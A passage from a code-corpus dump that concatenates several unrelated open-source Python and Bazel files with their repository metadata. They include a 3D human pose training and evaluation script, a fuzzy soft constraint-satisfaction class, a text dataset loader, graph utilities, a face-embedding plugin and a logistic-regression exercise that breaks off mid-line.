= model.global_step.eval()\n print(\"g_step: \", g_step)\n print(\"i_epoch: \", i_epoch)\n\n\n # === Loop through all the training batches ===\n for i in range( nbatches ):\n\n if (i+1) % log_every_n_batches == 0:\n # Print progress every log_every_n_batches batches\n print(\"Working on epoch {0}, batch {1} / {2}... \".format( current_epoch, i+1, nbatches), end=\"\" )\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n step_loss, loss_summary, lr_summary, _ = model.step( sess, enc_in, dec_out, FLAGS.dropout, isTraining=True )\n\n if (i+1) % log_every_n_batches == 0:\n # Log and print progress every log_every_n_batches batches\n model.train_writer.add_summary( loss_summary, current_step )\n model.train_writer.add_summary( lr_summary, current_step )\n step_time = (time.time() - start_time)\n start_time = time.time()\n print(\" done in {0:.2f} ms\".format( 1000*step_time / log_every_n_batches ) )\n print(train_dir)\n\n loss += step_loss\n current_step += 1\n # === end looping through training batches ===\n\n loss = loss / nbatches\n\n print(\"=============================\\n\"\n \"Global step: %d\\n\"\n \"Learning rate: %.2e\\n\"\n \"Train loss avg: %.4f\\n\"\n \"=============================\" % (model.global_step.eval(),\n model.learning_rate.eval(), loss) )\n # === End training for an epoch ===\n\n\n\n # === Testing after this epoch ===\n if i_epoch % FLAGS.period_epoch_eval == 0:\n isTraining = False\n n_joints = 17 if not(FLAGS.predict_14) else 14\n encoder_inputs, decoder_outputs = model.get_all_batches_eccv18( test_set_2d, test_set_3d, training=False)\n\n total_err, joint_err, step_time, loss = evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs)\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f\\n\"\n \"=============================\" % ( 1000*step_time, loss, total_err ))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i+1, joint_err[i]))\n print(\"=============================\")\n\n # Log the error to tensorboard\n summaries = sess.run( model.err_mm_summary, {model.err_mm: total_err} )\n model.test_writer.add_summary( summaries, current_step )\n\n # Save the model\n print(\"Saving the model... \", end=\"\")\n start_time = time.time()\n model.saver.save(sess, os.path.join(train_dir, 'checkpoint'), global_step=current_step)\n # model.saver.save(sess, os.path.join(train_dir, 'checkpoint'))\n print(\"done in {0:.2f} ms\".format(1000 * (time.time() - start_time)))\n\n sys.stdout.flush()\n\n\ndef get_action_subset( poses_set, action ):\n \"\"\"\n Given a preloaded dictionary of poses, load the subset of a particular action\n\n Args\n poses_set: dictionary with keys k=(subject, action, seqname),\n values v=(nxd matrix of poses)\n action: string. The action that we want to filter out\n Returns\n poses_subset: dictionary with same structure as poses_set, but only with the\n specified action.\n \"\"\"\n return {k:v for k, v in poses_set.items() if k[1] == action}\n\n\n\ndef evaluate_batches( sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs, ):\n\n \"\"\"\n Generic method that evaluates performance of a list of batches.\n May be used to evaluate all actions or a single action.\n\n Args\n sess\n model\n data_mean_3d\n data_std_3d\n dim_to_use_3d\n dim_to_ignore_3d\n data_mean_2d\n data_std_2d\n dim_to_use_2d\n dim_to_ignore_2d\n current_step\n encoder_inputs\n decoder_outputs\n current_epoch\n Returns\n\n total_err\n joint_err\n step_time\n loss\n \"\"\"\n\n n_joints = 17 if not(FLAGS.predict_14) else 14\n nbatches = len( encoder_inputs )\n\n if nbatches == 1:\n batch_size_eval = encoder_inputs[0].shape[0]\n else:\n batch_size_eval = FLAGS.batch_size\n\n # Loop through test examples\n all_dists, start_time, loss = [], time.time(), 0.\n log_every_n_batches = 100\n for i in range(nbatches):\n\n enc_in, dec_out = encoder_inputs[i], decoder_outputs[i]\n dp = 1.0 # dropout keep probability is always 1 at test time\n step_loss, loss_summary, poses3d = model.step( sess, enc_in, dec_out, dp, isTraining=False )\n loss += step_loss\n\n # denormalize\n enc_in = data_utils.unNormalizeData( enc_in, data_mean_2d, data_std_2d, dim_to_ignore_2d )\n dec_out = data_utils.unNormalizeData( dec_out, data_mean_3d, data_std_3d, dim_to_ignore_3d )\n poses3d = data_utils.unNormalizeData( poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d )\n\n # Keep only the relevant dimensions\n dtu3d = np.hstack( (np.arange(3), dim_to_use_3d) ) if not(FLAGS.predict_14) else dim_to_use_3d\n\n dec_out = dec_out[:, dtu3d]\n poses3d = poses3d[:, dtu3d]\n\n print (\"dec_out\" ,dec_out.shape[0], batch_size_eval)\n print (\"poses3d\", poses3d.shape[0], batch_size_eval)\n\n # assert dec_out.shape[0] == FLAGS.batch_size\n # assert poses3d.shape[0] == FLAGS.batch_size\n assert dec_out.shape[0] == batch_size_eval\n assert poses3d.shape[0] == batch_size_eval\n\n\n if FLAGS.procrustes:\n # Apply per-frame procrustes alignment if asked to do so\n for j in range(batch_size_eval):\n gt = np.reshape(dec_out[j,:],[-1,3])\n out = np.reshape(poses3d[j,:],[-1,3])\n _, Z, T, b, c = procrustes.compute_similarity_transform(gt,out,compute_optimal_scale=True)\n out = (b*out.dot(T))+c\n\n poses3d[j,:] = np.reshape(out,[-1,17*3] ) if not(FLAGS.predict_14) else np.reshape(out,[-1,14*3] )\n\n # Compute Euclidean distance error per joint\n sqerr = (poses3d - dec_out)**2 # Squared error between prediction and expected output\n dists = np.zeros( (sqerr.shape[0], n_joints) ) # Array with L2 error per joint in mm\n dist_idx = 0\n for k in np.arange(0, n_joints*3, 3):\n # Sum across X,Y, and Z dimenstions to obtain L2 distance\n dists[:,dist_idx] = np.sqrt( np.sum( sqerr[:, k:k+3], axis=1 ))\n dist_idx = dist_idx + 1\n\n all_dists.append(dists)\n assert sqerr.shape[0] == batch_size_eval\n\n # error[i] = np.mean(np.sqrt(np.sum((gtPose - predPose) ** 2, axis=1)))\n\n\n\n step_time = (time.time() - start_time) / nbatches\n loss = loss / nbatches\n\n all_dists = np.vstack( all_dists )\n\n # Error per joint and total for all passed batches\n joint_err = np.mean( all_dists, axis=0 )\n # total_err = np.mean( all_dists )\n person_err = np.mean( all_dists, axis=1 )\n total_err_person = np.mean(person_err)\n\n return total_err_person, joint_err, step_time, loss\n\n\n\ndef eval_eccv18():\n \"\"\"Get samples from a model and visualize them\"\"\"\n\n actions = data_utils.define_actions( FLAGS.action )\n\n # Load 3d data\n train_set_3d, test_set_3d, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3)\n\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2)\n\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n with tf.Session(config=tf.ConfigProto(\n device_count=device_count,\n allow_soft_placement=True )) as sess:\n\n # === Create the model ===\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model(sess, actions, FLAGS.batch_size, FLAGS.centering_2d, for_eccv18=True)\n print(\"Model loaded\")\n\n\n\n n_joints = 17 if not (FLAGS.predict_14) else 14\n encoder_inputs, decoder_outputs = model.get_all_batches_eccv18(test_set_2d, test_set_3d, training=False)\n\n total_err, joint_err, step_time, loss = evaluate_batches(sess, model,\n data_mean_3d, data_std_3d, dim_to_use_3d, dim_to_ignore_3d,\n data_mean_2d, data_std_2d, dim_to_use_2d, dim_to_ignore_2d,\n encoder_inputs, decoder_outputs)\n\n print(\"=============================\\n\"\n \"Step-time (ms): %.4f\\n\"\n \"Val loss avg: %.4f\\n\"\n \"Val error avg (mm): %.2f\\n\"\n \"=============================\" % (1000 * step_time, loss, total_err))\n\n for i in range(n_joints):\n # 6 spaces, right-aligned, 5 decimal places\n print(\"Error in joint {0:02d} (mm): {1:>5.2f}\".format(i + 1, joint_err[i]))\n print(\"=============================\")\n\n\n\ndef generate_3dpose_eccv18():\n\n # Generate directory for CSV prediction files\n if FLAGS.for_submission == True:\n predict_step_dir = FLAGS.prediction_dir + \"_\" + str(FLAGS.load)\n else:\n predict_step_dir = FLAGS.prediction_dir + \"_Val_\" + str(FLAGS.load)\n\n if not (os.path.isdir(predict_step_dir)):\n os.makedirs(os.path.join(predict_step_dir))\n actions = data_utils.define_actions( FLAGS.action )\n\n\n # Load 3d & 2d data\n _, _, data_mean_3d, data_std_3d, dim_to_ignore_3d, dim_to_use_3d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=3, for_submission = FLAGS.for_submission)\n\n train_set_2d, test_set_2d, data_mean_2d, data_std_2d, dim_to_ignore_2d, dim_to_use_2d = data_utils.read_data_eccv18(\n FLAGS.data_dir, FLAGS.centering_2d, FLAGS.detector_2d, FLAGS.idx_split, dim=2, for_submission = FLAGS.for_submission)\n\n\n # Load test filename_list (Unshuffled)\n file_list = []\n if (FLAGS.for_submission == False):\n split_path = os.path.join(FLAGS.data_dir, \"split\", 'Val_list_' + FLAGS.detector_2d +'.csv')\n else:\n split_path = os.path.join(FLAGS.data_dir, \"split\", 'Test_list_' + FLAGS.detector_2d +'.csv')\n with open(split_path, 'r') as f:\n csvReader = csv.reader(f)\n for row in csvReader:\n # file_list.append(row[0].split('.jp')[0])\n file_list.append(row)\n\n device_count = {\"GPU\": 0} if FLAGS.use_cpu else {\"GPU\": 1}\n idx_file =0\n with tf.Session(config=tf.ConfigProto( device_count = device_count )) as sess:\n # === Create the model ===\n print(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.linear_size))\n model = create_model(sess, actions, FLAGS.batch_size, FLAGS.centering_2d, for_eccv18=True)\n print(\"Model loaded\")\n\n n_joints = 17 if not (FLAGS.predict_14) else 14\n encoder_inputs = model.get_all_batches_2D_eccv18(test_set_2d)\n nbatches = len(encoder_inputs)\n\n print(\"Model (%d step) created\" % FLAGS.load)\n g_step = model.global_step.eval()\n print(\"g_step: \", g_step)\n\n\n for i in range(nbatches):\n\n enc_in = encoder_inputs[i]\n dp = 1.0 # dropout keep probability is always 1 at test time\n poses3d = model.step_only_enc(sess, enc_in, dp, isTraining=False)\n\n # denormalize\n poses3d = data_utils.unNormalizeData(poses3d, data_mean_3d, data_std_3d, dim_to_ignore_3d)\n\n # Keep only the relevant dimensions\n dtu3d = np.hstack((np.arange(3), dim_to_use_3d)) if not (FLAGS.predict_14) else dim_to_use_3d\n poses3d = poses3d[:, dtu3d]\n\n batch_size = poses3d.shape[0]\n n_joints = 17 if not(FLAGS.predict_14) else 14\n\n for i in range(batch_size):\n pose3d_sample = poses3d[i].reshape(n_joints, -1)\n print( predict_step_dir +\"/\" + file_list[idx_file][0] + \".csv\")\n np.savetxt(predict_step_dir +\"/\" + file_list[idx_file][0] + \".csv\", pose3d_sample, delimiter=\",\", fmt='%.3f')\n idx_file +=1\n\n\n # convert csv files to a json file\n src_path = predict_step_dir\n out_path = src_path + \"_json\"\n # out_path = '_'.join(src_path.split(\"_\")[ : 3]) + \"_json\"\n\n # print (src_path, out_path, poses3d.shape)\n # # save prediction results as a single CSV file\n # if not (os.path.isdir(out_path)):\n # os.makedirs(os.path.join(out_path))\n #\n # np.savetxt(out_path + \"/split_\" + str(FLAGS.idx_split) + \".csv\", poses3d, delimiter=\",\", fmt='%.3f')\n\n csv2json(src_path, out_path)\n\n\n\n\ndef csv2json(src_path, out_path):\n if not(os.path.isdir(out_path)):\n os.makedirs(out_path)\n\n\n file_name = \"result3d.json\"\n res_path = os.path.join(out_path, file_name)\n\n\n csvs = sorted(glob.glob(src_path+'/*'))\n results = {}\n\n cnt = 0\n for csv_file in tqdm.tqdm(csvs):\n fn = os.path.basename(csv_file).split('.')[0].split('_')[1]\n csv = pd.read_csv(csv_file, header=None)\n joint = np.array(csv)\n results.update({fn:joint.flatten().tolist()})\n cnt += 1\n\n with open(res_path, 'w') as outfile:\n json_res = json.dumps([{\"image_id\":int(k), \"keypoints\":[v]} for k, v in sorted(results.items())])\n outfile.write(json_res)\n\n\ndef main(_):\n if FLAGS.mode == 'train':\n train_eccv18()\n elif FLAGS.mode == 'eval':\n eval_eccv18()\n elif FLAGS.mode == 'generate':\n generate_3dpose_eccv18()\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"csehong/h36m_eccv18","sub_path":"Model/src/predict_3dpose_eccv18.py","file_name":"predict_3dpose_eccv18.py","file_ext":"py","file_size_in_byte":21564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37637386149","text":"#coding=utf-8\n\nimport numpy as np\nimport sys\n\n\nclass CSP:\n \"\"\"\n CSP class\n \"\"\"\n def __init__(self):\n self._goals = list()\n self._escape_points = list()\n self._constraints_arc = list()\n\n\n def setGoals(self, goals):\n \"\"\"\n id_goal -> probability \\n\n self._goals is a list of tuple(id_goal, probability) \\n\n Args:\n goals: list of tuple(id_goal, probability)\n \"\"\"\n self._goals = goals\n\n\n def setEscapePoints(self, escape_p):\n \"\"\"\n id_escape_point -> value = number in [0,1] of the reciprocal of the distance from EE to escape point \\n\n self._escape_points is a list of tuple(id_escape_p, value) \\n\n Args:\n escape_p: list of tuple(id_escape_p, value)\n \"\"\"\n self._escape_points = escape_p\n\n\n def setConstraintsArc(self, distances):\n \"\"\"\n (id_goal, id_escape_point) -> value = number in [0,1] of the reciprocal of the distance from goal to escape point \\n\n self._constraints_arc is a list of tuple(id_goal, id_escape_p, value) \\n\n Args:\n distances: list of tuple(id_goal, id_escape_p, value)\n \"\"\"\n self._constraints_arc = distances\n \n\n def fuzzySCSP(self, goals, escape_p, distances):\n \"\"\"\n Start fuzzy soft CSP \\n\n Args:\n goals: list of tuple(id_goal, probability)\n escape_p: list of tuple(id_escape_p, value)\n distances: list of tuple(id_goal, id_escape_p, value)\n Return: tuple (id_goal, id_escape_point, value) result of projection\n \"\"\"\n #Set constraints\n self.setGoals(goals)\n self.setEscapePoints(escape_p)\n self.setConstraintsArc(distances)\n\n #Combining\n result_comb = self.fuzzyCombining()\n #Projection\n result_proj = self.fuzzyProjection(result_comb)\n\n return result_proj\n\n\n def fuzzyCombining(self):\n \"\"\"\n Combining = take min value \\n\n Return: list of results of combining\n \"\"\"\n #result_combining is a list of tuple(id_goal, id_escape_p, min) \n results_combining = list()\n for c1 in self._goals:\n id_goal = c1[0]\n prob_goal = c1[1]\n for c2 in self._escape_points:\n id_escape_p = c2[0]\n value_escape_p = c2[1]\n #Compute c3 value\n value_constraint = self.findC3Value(id_goal, id_escape_p)\n if(value_constraint is None):\n print(\"Error: c3 value is NONE\")\n sys.exit()\n #Compute min\n min_value = min(prob_goal, value_escape_p, value_constraint)\n #create tuple (id_goal, id_escape_p, min) and insert it into results_combining list\n tmp_tuple = (id_goal, id_escape_p, min_value)\n results_combining.append(tmp_tuple)\n\n return results_combining\n \n\n def fuzzyProjection(self, combining_result):\n \"\"\"\n Projection = take max value \\n\n Return: tuple (id_goal, id_escape_point, value) result of projection\n \"\"\"\n tmp_max = -1\n final_tuple = None\n for tpe in combining_result:\n if(tpe[2] > tmp_max):\n tmp_max = tpe[2]\n final_tuple = tpe\n \n return final_tuple\n\n\n def findC3Value(self, id_g, id_ep):\n \"\"\"\n C3 is the tuple in self._constraints_arc in the form (id_goal, id_escape_p, value) \\n\n Args:\n id_g: id of the goal\n id_ep: id of the escape point\n Return: value of c3 with (id_g, id_ep)\n \"\"\" \n for c3 in self._constraints_arc:\n if((c3[0] == id_g) and (c3[1] == id_ep)):\n c3_value = c3[2]\n return c3_value\n\n return None\n\n ","repo_name":"Shared-control/improved-apf","sub_path":"system/shared_control/src/shared_control/Csp.py","file_name":"Csp.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"35210465363","text":"def _impl(repository_ctx):\n \"\"\"Pulls in from the environment and creates\n a bazel file at containing the resulting values\"\"\"\n path = repository_ctx.attr.path\n \n # Create the build\n repository_ctx.file(\"BUILD\", \"\"\"\nexports_files(\n [\"%s\"],\n visibility:[\"//visibility:public\"],\n)\n \"\"\" % path)\n\n # Create vars.bzl\n var_defs = [\"%s = %s\" %\n (var, repr(repository_ctx.os.environ.get(var, None)))\n for var in repository_ctx.attr.vars]\n repository_ctx.file(path, \"\\n\".join(var_defs))\n\nenvironment_repository = repository_rule(\n implementation=_impl,\n local=True,\n configure=True,\n attrs={\n 'vars': attr.string_list(mandatory=True),\n 'path': attr.string(default=\"vars.bzl\")\n })\n","repo_name":"gaycodegal/tutorials","sub_path":"environment-variables-bazel/bzl/environment.bzl","file_name":"environment.bzl","file_ext":"bzl","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8801546381","text":"import re\n\nimport numpy as np\n\nimport torch\nfrom torch.utils.data.dataset import Dataset\n\nclass TextDataset(Dataset):\n def __init__(self, word2idx, fp_dataset, train=True, val=False, split=True):\n self.word2idx = word2idx\n self.train = train\n self.val = val\n\n if train:\n self.text = []\n self.label = []\n for line in open(fp_dataset):\n label, line = line.split('+++$+++')\n line = line.lower()\n line = re.sub(r'(.)\\1{2,}', r'\\1\\1', line) \n line = re.sub(r'[^a-z!? ]', '', line)\n self.text.append(line.split())\n self.label.append(int(label))\n\n if split:\n r = np.random.RandomState(42)\n idx = r.permutation(200000)\n if val:\n self.text = [self.text[i] for i in idx[:10000]]\n self.label = [self.label[i] for i in idx[:10000]]\n else:\n self.text = [self.text[i] for i in idx[10000:]]\n self.label = [self.label[i] for i in idx[10000:]]\n else:\n self.text = []\n for line in open(fp_dataset):\n line = line.split(',', 1)[1]\n line = line.lower()\n line = re.sub(r'(.)\\1{2,}', r'\\1\\1', line) \n line = re.sub(r'[^a-z!? ]', '', line)\n self.text.append(line.split())\n\n def __getitem__(self, index):\n line = self.text[index]\n tokens = []\n for idx, word in enumerate(line):\n if word in self.word2idx:\n tokens.append(self.word2idx[word])\n tokens = tokens[:40]\n tokens += [self.word2idx['']] * (40 - len(tokens))\n\n if self.train:\n return torch.LongTensor(tokens), torch.LongTensor([self.label[index]])\n else:\n return torch.LongTensor(tokens)\n\n def __len__(self):\n return len(self.text)\n","repo_name":"empennage98/ML2018SPRING","sub_path":"hw5/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"213933827","text":"import concentrate\nimport sys\nfrom setuptools import setup\n\n\nif sys.version_info[0] < 3:\n sys.exit('python < 3 unsupported.')\n\n requirements = ['yaml'],\n\nsetup(\n name='concentrate',\n version=concentrate.__version__,\n packages=['concentrate'],\n license=['MIT'],\n description='',\n author=concentrate.__author__,\n author_email='bakednt@gmail.com',\n url='',\n scripts=['bin/concentrate']\n )\n","repo_name":"otakumesi/concentrate","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38635903388","text":"import os \n\nWORKPSACE_DIR = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\nCOORD_X = 0\nCOORD_Y = 1\nCOORD_Z = 2\n\nEPS = 0.0001\n\n# enable 64 bit numbering for higher precision\n#import jax.config\n#jax.config.update(\"jax_enable_x64\", True)\n\n","repo_name":"hitimr/NSSC2","sub_path":"Ex2/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73492948586","text":"'''graph representation, i/o and basic tools\n\nGraph is a dictionary of sets. Keys - are the nodes, value - set of adjucent\nnodes. It isn't required for nodes in keys to include all the nodes from values.\n'''\n\nfrom collections import defaultdict\n\n\ndef read_edgelist(pathname):\n g = defaultdict(set)\n\n with open(pathname) as f:\n for line in f:\n v, w = line.split()\n g[v].add(w)\n\n return g\n\n\ndef edges(g):\n for v, adjucent in g.items():\n for w in adjucent:\n yield v, w\n\n\ndef to_undirected(g):\n for v, w in edges(g):\n g[w].add(v)\n\n\ndef traverse(g, start):\n queue = [start]\n visited = {start}\n\n while queue:\n v = queue.pop()\n yield v\n assert v in visited\n\n for w in g[v]:\n if w not in visited:\n queue.append(w)\n visited.add(w)\n\n\ndef connected_components(g):\n 'warning: implemented for undirected graphs only'\n\n covered = set()\n\n for v in g:\n if v not in covered:\n component = set(traverse(g, v))\n yield component\n\n covered |= component\n\n\ndef get_subgraph(g, nodes):\n subgraph = defaultdict(set)\n\n for v, w in edges(g):\n if v in nodes and w in nodes:\n subgraph[v].add(w)\n\n return subgraph\n\n\ndef write_edgelist(g, pathname):\n with open(pathname, 'w') as f:\n for v, w in edges(g):\n f.write('%s %s\\n' % (v, w))\n","repo_name":"barahilia/algorhymes","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72811289388","text":"import logging\nimport math\nfrom collections import namedtuple\nfrom typing import List\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf1\nfrom tensorflow.python.platform import gfile\nfrom cached_property import cached_property\n\nimport sys\nsys.path.append('srcext')\nfrom mtcnn import MTCNN\n\nfrom src.constants import ENV\nfrom src.services.dto.bounding_box import BoundingBoxDTO\nfrom src.services.facescan.plugins import mixins\nfrom src.services.facescan.imgscaler.imgscaler import ImgScaler\nfrom src.services.imgtools.proc_img import crop_img, squish_img\nfrom src.services.imgtools.types import Array3D\nfrom src.services.utils.pyutils import get_current_dir\n\nfrom src.services.facescan.plugins import base\nfrom src._endpoints import FaceDetection\n\nCURRENT_DIR = get_current_dir(__file__)\n\nlogger = logging.getLogger(__name__)\n_EmbeddingCalculator = namedtuple('_EmbeddingCalculator', 'graph sess')\n_FaceDetectionNets = namedtuple('_FaceDetectionNets', 'pnet rnet onet')\n\n\ndef prewhiten(img):\n \"\"\" Normalize image.\"\"\"\n mean = np.mean(img)\n std = np.std(img)\n std_adj = np.maximum(std, 1.0 / np.sqrt(img.size))\n y = np.multiply(np.subtract(img, mean), 1 / std_adj)\n return y\n\n\nclass FaceDetector(mixins.FaceDetectorMixin, base.BasePlugin):\n FACE_MIN_SIZE = 20\n SCALE_FACTOR = 0.709\n IMAGE_SIZE = 160\n IMG_LENGTH_LIMIT = ENV.IMG_LENGTH_LIMIT\n KEYPOINTS_ORDER = ['left_eye', 'right_eye', 'nose', 'mouth_left', 'mouth_right']\n\n # detection settings\n det_prob_threshold = 0.85\n det_threshold_a = 0.9436513301\n det_threshold_b = 0.7059968943\n det_threshold_c = 0.5506904359\n\n # face alignment settings (were calculated for current detector)\n left_margin = 0.2125984251968504\n right_margin = 0.2230769230769231\n top_margin = 0.10526315789473684\n bottom_margin = 0.09868421052631579\n\n @cached_property\n def _face_detection_net(self):\n return MTCNN(\n min_face_size=self.FACE_MIN_SIZE,\n scale_factor=self.SCALE_FACTOR,\n steps_threshold=[self.det_threshold_a, self.det_threshold_b, self.det_threshold_c]\n )\n\n def crop_face(self, img: Array3D, box: BoundingBoxDTO) -> Array3D:\n return squish_img(crop_img(img, box), (self.IMAGE_SIZE, self.IMAGE_SIZE))\n\n def find_faces(self, img: Array3D, det_prob_threshold: float = None) -> List[BoundingBoxDTO]:\n if det_prob_threshold is None:\n det_prob_threshold = self.det_prob_threshold\n assert 0 <= det_prob_threshold <= 1\n scaler = ImgScaler(self.IMG_LENGTH_LIMIT)\n img = scaler.downscale_img(img)\n\n if FaceDetection.SKIPPING_FACE_DETECTION:\n bounding_boxes = []\n bounding_boxes.append({\n 'box': [0, 0, img.shape[0], img.shape[1]],\n 'confidence': 1.0,\n 'keypoints': {\n 'left_eye': (),\n 'right_eye': (),\n 'nose': (),\n 'mouth_left': (),\n 'mouth_right': (),\n }\n })\n det_prob_threshold = self.det_prob_threshold\n detect_face_result = bounding_boxes\n else:\n fdn = self._face_detection_net\n detect_face_result = fdn.detect_faces(img)\n\n img_size = np.asarray(img.shape)[0:2]\n bounding_boxes = []\n\n for face in detect_face_result:\n x, y, w, h = face['box']\n box = BoundingBoxDTO(\n x_min=int(np.maximum(x - (self.left_margin * w), 0)),\n y_min=int(np.maximum(y - (self.top_margin * h), 0)),\n x_max=int(np.minimum(x + w + (self.right_margin * w), img_size[1])),\n y_max=int(np.minimum(y + h + (self.bottom_margin * h), img_size[0])),\n np_landmarks=np.array([list(face['keypoints'][point_name]) for point_name in self.KEYPOINTS_ORDER]),\n probability=face['confidence']\n )\n logger.debug(f\"Found: {box}\")\n bounding_boxes.append(box)\n\n filtered_bounding_boxes = []\n for box in bounding_boxes:\n box = box.scaled(scaler.upscale_coefficient)\n if box.probability <= det_prob_threshold:\n logger.debug(f'Box filtered out because below threshold ({det_prob_threshold}): {box}')\n continue\n filtered_bounding_boxes.append(box)\n return filtered_bounding_boxes\n\n\nclass Calculator(mixins.CalculatorMixin, base.BasePlugin):\n ml_models = (\n # VGGFace2 training set, 0.9965 LFW accuracy\n ('20180402-114759', '1im5Qq006ZEV_tViKh3cgia_Q4jJ13bRK', (1.1817961, 5.291995557), 0.4),\n # CASIA-WebFace training set, 0.9905 LFW accuracy\n ('20180408-102900', '100w4JIUz44Tkwte9F-wEH0DOFsY-bPaw', (1.1362496, 5.803152427), 0.4),\n # CASIA-WebFace-Masked, 0.9873 LFW, 0.9667 LFW-Masked (orig model has 0.9350 on LFW-Masked)\n ('inception_resnetv1_casia_masked', '1FddVjS3JbtUOjgO0kWs43CAh0nJH2RrG', (1.1145709, 4.554903071), 0.6)\n )\n BATCH_SIZE = 25\n\n @property\n def ml_model_file(self):\n return str(self.ml_model.path / f'{self.ml_model.name}.pb')\n\n def calc_embedding(self, face_img: Array3D) -> Array3D:\n return self._calculate_embeddings([face_img])[0]\n\n @cached_property\n def _embedding_calculator(self):\n with tf1.Graph().as_default() as graph:\n graph_def = tf1.GraphDef()\n with gfile.FastGFile(self.ml_model_file, 'rb') as f:\n model = f.read()\n graph_def.ParseFromString(model)\n tf1.import_graph_def(graph_def, name='')\n return _EmbeddingCalculator(graph=graph, sess=tf1.Session(graph=graph))\n\n def _calculate_embeddings(self, cropped_images):\n \"\"\"Run forward pass to calculate embeddings\"\"\"\n prewhitened_images = [prewhiten(img) for img in cropped_images]\n calc_model = self._embedding_calculator\n graph_images_placeholder = calc_model.graph.get_tensor_by_name(\"input:0\")\n graph_embeddings = calc_model.graph.get_tensor_by_name(\"embeddings:0\")\n graph_phase_train_placeholder = calc_model.graph.get_tensor_by_name(\"phase_train:0\")\n embedding_size = graph_embeddings.get_shape()[1]\n image_count = len(prewhitened_images)\n batches_per_epoch = int(math.ceil(1.0 * image_count / self.BATCH_SIZE))\n embeddings = np.zeros((image_count, embedding_size))\n for i in range(batches_per_epoch):\n start_index = i * self.BATCH_SIZE\n end_index = min((i + 1) * self.BATCH_SIZE, image_count)\n feed_dict = {graph_images_placeholder: prewhitened_images, graph_phase_train_placeholder: False}\n embeddings[start_index:end_index, :] = calc_model.sess.run(\n graph_embeddings, feed_dict=feed_dict)\n return embeddings\n\n\nclass LandmarksDetector(mixins.LandmarksDetectorMixin, base.BasePlugin):\n \"\"\" Extract landmarks from FaceDetector results.\"\"\"\n\n\nclass PoseEstimator(mixins.PoseEstimatorMixin, base.BasePlugin):\n \"\"\" Estimate head rotation regarding the camera \"\"\"\n \n @staticmethod\n def landmarks_names_ordered():\n \"\"\" List of lanmarks names orderred as in detector \"\"\"\n return FaceDetector.KEYPOINTS_ORDER\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/facescan/plugins/facenet/facenet.py","file_name":"facenet.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"} +{"seq_id":"8987468358","text":"import pandas as pd\nimport numpy as np\nfrom scipy.spatial import distance\nfrom sklearn.metrics import roc_auc_score\n\nX = pd.read_csv('data-logistic.csv', header=None).loc[:, 1:]\ny = pd.read_csv('data-logistic.csv', header=None).loc[:, 0]\n\n\ndef gradient_descent(X_2, y_2, C = 10.0):\n y_predict_list = []\n a=0\n wi = np.array([0.0, 0.0])\n wj = np.array([0.0, 0.0])\n total_rows = X_2.shape[0]\n dst = 1\n k = 0.1\n for iter in range(1000):\n if dst >= 10 ** -5:\n wi = wj\n wj = np.array([0.0, 0.0])\n summ_w1 = 0\n summ_w2 = 0\n for i in range(total_rows):\n summ_w1 += y_2[i] * X_2.values[i][0] * (\n 1 - 1 / (1 + np.exp(-y_2[i] * (wi[0] * X_2.values[i][0] + wi[1] * X_2.values[i][1]))))\n summ_w2 += y_2[i] * X_2.values[i][1] * (\n 1 - 1 / (1 + np.exp(-y_2[i] * (wi[0] * X_2.values[i][0] + wi[1] * X_2.values[i][1]))))\n wj[0] = wi[0] + (k / total_rows) * summ_w1 - k * C * wi[0]\n wj[1] = wi[1] + (k / total_rows) * summ_w2 - k * C * wi[1]\n dst = distance.euclidean(wi, wj)\n else:\n break\n print('Iter = {}'.format(iter))\n for i in range(total_rows):\n a = 1 / (1 + np.exp(-wj[0] * X_2.values[i][0] - 